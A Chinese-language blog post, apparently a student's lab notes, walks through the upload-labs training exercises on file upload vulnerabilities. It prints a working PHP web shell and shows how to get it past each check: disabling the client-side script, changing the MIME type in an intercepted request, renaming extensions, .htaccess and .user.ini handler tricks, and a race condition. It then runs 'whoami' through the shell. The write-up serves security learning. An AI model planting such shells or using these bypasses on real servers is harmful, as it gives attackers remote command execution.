<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>12.1-文件上传漏洞 | 无名BLOG</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 
  
    <link rel="icon" href="/../img/icon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <script src="https://cdn.jsdelivr.net/npm/feather-icons/dist/feather.min.js"></script>
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="header-outer" class="outer">
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle"></a>
        
          <a class="main-nav-link" href="/">首页</a>
        
          <a class="main-nav-link" href="/archives">归档</a>
        
          <a class="main-nav-link" href="/about">关于</a>
        
          <a class="main-nav-link" href="/board">留言</a>
        
      </nav>
      <nav id="sub-nav">
        
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-12.1文件上传漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="name">
      12.1-文件上传漏洞
    </h1>
  

        <div class="article-meta">
          <a href="/2024/01/09/12.1%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time datetime="2024-01-09T01:52:03.000Z" itemprop="datePublished">2024-01-09</time>
</a>
          
          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p>​	文件上传漏洞是发生在有上传功能的应用中，如果应用程序对用户的上传文件没有控制或者存在缺陷，攻击者可以利用应用上传功能存在的缺陷，上传木马、病毒等有危害的文件到服务器上面，控制服务器文件</p>
<p>​	上传漏洞产生的主要原因是:应用中存在上传功能，但是上传的文件没有经过严格的合法性检验或者检验函数存在缺陷，导致可以上传木马文件到服务器</p>
<p>​	文件上传漏洞危害极大因为可以直接上传恶意代码到服务器上，可能会造成服务器的网页篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果。</p>
<h3 id="upload-labs-master"><a href="#upload-labs-master" class="headerlink" title="upload-labs-master"></a>upload-labs-master</h3><h4 id="Pass-01"><a href="#Pass-01" class="headerlink" title="Pass-01"></a>Pass-01</h4><p>网站页面</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109103748739.png" alt="image-20240109103748739"></p>
<p>编写病毒</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @system($_GET[a]); ?&gt;</span><br></pre></td></tr></table></figure>

<p>取名1.php</p>
<p>先正常上传一张图片</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109103957331.png" alt="image-20240109103957331"></p>
<p>把图片打开查看其保存位置</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104048328.png" alt="image-20240109104048328"></p>
<p>尝试上传病毒，显示无法上传，F12查看</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104225909.png" alt="image-20240109104225909"></p>
<p>发现该上传命令是用js来判断上传文件类型</p>
<h5 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h5><p>删除js</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104309246.png" alt="image-20240109104309246"></p>
<p>禁用js</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104401656.png" alt="image-20240109104401656"></p>
<p>上传病毒成功</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104429173.png" alt="image-20240109104429173"></p>
<p>进入upload子网址的1.php</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104554305.png" alt="image-20240109104554305"></p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109104540633.png" alt="image-20240109104540633"></p>
<p>运行成功。</p>
<h4 id="Pass-02"><a href="#Pass-02" class="headerlink" title="Pass-02"></a>Pass-02</h4><p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109110018031.png" alt="image-20240109110018031"></p>
<p>直接上传病毒无法上传</p>
<p>利用yakit抓包</p>
<p>更改文件上传类型</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109110320272.png" alt="image-20240109110320272"></p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109110902502.png" alt="image-20240109110902502"></p>
<p>上传成功</p>
<p>右键打开图片</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109110433363.png" alt="image-20240109110433363"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload-labs-master/upload/1.php/?a=whoami</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109110618388.png" alt="image-20240109110618388"></p>
<p>成功</p>
<p>注释：yakit的直接展示是在本地ip展示，需要将子网页放在正确的ip中运行。</p>
<h4 id="Pass-03"><a href="#Pass-03" class="headerlink" title="Pass-03"></a>Pass-03</h4><p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109141829893.png" alt="image-20240109141829893"></p>
<p>将php文件改后缀</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109141849282.png" alt="image-20240109141849282"></p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109141908373.png" alt="image-20240109141908373"></p>
<p>上传成功。</p>
<h4 id="Pass-04"><a href="#Pass-04" class="headerlink" title="Pass-04"></a>Pass-04</h4><p>创建一个名为.htaccess的文件，代码为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;3.jpg&quot;&gt;</span><br><span class="line"></span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line"></span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109142557816.png" alt="image-20240109142557816"></p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109142611977.png" alt="image-20240109142611977"></p>
<p>再将1.php文件改名为3.jpg</p>
<p>再将3.jpg上传到网站中</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109142700267.png" alt="image-20240109142700267"></p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109142639756.png" alt="image-20240109142639756"></p>
<p>运行代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/upload-labs/upload/3.jpg?a=whoami</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109142753348.png" alt="image-20240109142753348"></p>
<p>成功。</p>
<h4 id="Pass-05"><a href="#Pass-05" class="headerlink" title="Pass-05"></a>Pass-05</h4><p>创建文件user.ini</p>
<p>内容：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=2.jpg</span><br></pre></td></tr></table></figure>

<p>服务器使用CGI&#x2F; FastCGI模式</p>
<p>目录有可执行的php代码</p>
<p>需要上传2.jpg，内容为病毒</p>
<p>上传成功后300s执行目录中的php文件</p>
<h4 id="Pass-06"><a href="#Pass-06" class="headerlink" title="Pass-06"></a>Pass-06</h4><p>创建文件1.PHP</p>
<p>输入代码</p>
<p>上传文件</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109145913229.png" alt="image-20240109145913229"></p>
<p>将图片地址复制到网址栏运行代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload-labs/upload/202401091500192840.PHP?a=whoami</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109150119248.png" alt="image-20240109150119248"></p>
<p>成功</p>
<h4 id="Pass-07"><a href="#Pass-07" class="headerlink" title="Pass-07"></a>Pass-07</h4><h4 id="Pass-18"><a href="#Pass-18" class="headerlink" title="Pass-18"></a>Pass-18</h4><p>创建文件3.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">fputs(fopen(&#x27;../p.php&#x27;,&#x27;w&#x27;),&#x27;&lt;?php @system($_GET[a]); ?&gt;&#x27;)</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>上传文件3.php</p>
<p>使用yakit抓上传的这个包</p>
<p>然后进入网址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/upload-labs-master/upload/3.php</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109161335530.png" alt="image-20240109161335530"></p>
<p>必报错，抓这个包</p>
<p>给刚刚的两个包设置</p>
<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109161438605.png" alt="image-20240109161438605"></p>
<p>先上传，在进入，分别999次数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/upload-labs-master/p.php</span><br></pre></td></tr></table></figure>

<p>然后就可以在根目录下找到p.php这个文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/upload-labs-master/p.php?a=whoami</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lanceplm/wanganpic/main/img/image-20240109161625403.png" alt="image-20240109161625403"></p>
<p>成功</p>

      
    </div>
  </div>
 
</article>


  
    <section id="comments" class="comments">
      <style>
        .comments{margin:30px;padding:10px;background:#fff}
        @media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#fff}}
      </style>
      <div id="vcomment" class="comment"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
    var notify = 'true' == true ? true : false;
    var verify = 'false' == true ? true : false;
    new Valine({
        av: AV,
        el: '#vcomment',
        notify: notify,
        app_id: "HBismw2vU6hg56PslAF2APW1-gzGzoHsz",
        app_key: "k41e2BJYdNbojyHuMnKT5LBK",
        placeholder: "留下你来过的痕迹~",
        avatar:"robohash",
    });
</script>

  </section>

</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
    <div class="widget-wrap-info">
        <img src="/../img/avator.jpg" class="widget-wrap-info-img">
        <div class="widget-wrap-info-author">向来痴</div>
        <div class="widget-wrap-info-signature">业精于勤，荒于嬉。</div>
    </div>
    <div class="info-nav">
        <ul class="info-nav-ul">
        
            <li class="info-nav-li">
            <a class="info-nav-link" href="/">
                <div class="info-nav-div">
                    <span class="info-nav-icon">
                        <i data-feather="home"></i>
                    </span>
                    <span class="info-nav-name">首页</span>
                </div>
            </a>
           </li>
          
            <li class="info-nav-li">
            <a class="info-nav-link" href="/archives">
                <div class="info-nav-div">
                    <span class="info-nav-icon">
                        <i data-feather="archive"></i>
                    </span>
                    <span class="info-nav-name">归档</span>
                </div>
            </a>
           </li>
          
            <li class="info-nav-li">
            <a class="info-nav-link" href="/about">
                <div class="info-nav-div">
                    <span class="info-nav-icon">
                        <i data-feather="alert-circle"></i>
                    </span>
                    <span class="info-nav-name">关于</span>
                </div>
            </a>
           </li>
          
            <li class="info-nav-li">
            <a class="info-nav-link" href="/board">
                <div class="info-nav-div">
                    <span class="info-nav-icon">
                        <i data-feather="edit-3"></i>
                    </span>
                    <span class="info-nav-name">留言</span>
                </div>
            </a>
           </li>
          
        </ul>
    </div>
</div>
  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2024 向来痴<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> | Theme by  <a href="https://github.com/FuShaoLei/hexo-theme-hiya" target="_blank">Hiya</a>
      
        <br>
        <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
      <span id="busuanzi_container_site_uv">
        访客数<span id="busuanzi_value_site_uv"></span>人次
      </span>
        
      
    </div>
    
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/,home" class="mobile-nav-link">首页</a>
  
    <a href="/archives,archive" class="mobile-nav-link">归档</a>
  
    <a href="/about,alert-circle" class="mobile-nav-link">关于</a>
  
    <a href="/board,edit-3" class="mobile-nav-link">留言</a>
  
</nav>
    <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.4.1.min.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script>
    feather.replace()
</script>

<script src="/js/script.js"></script>


  </div>
</body>
</html>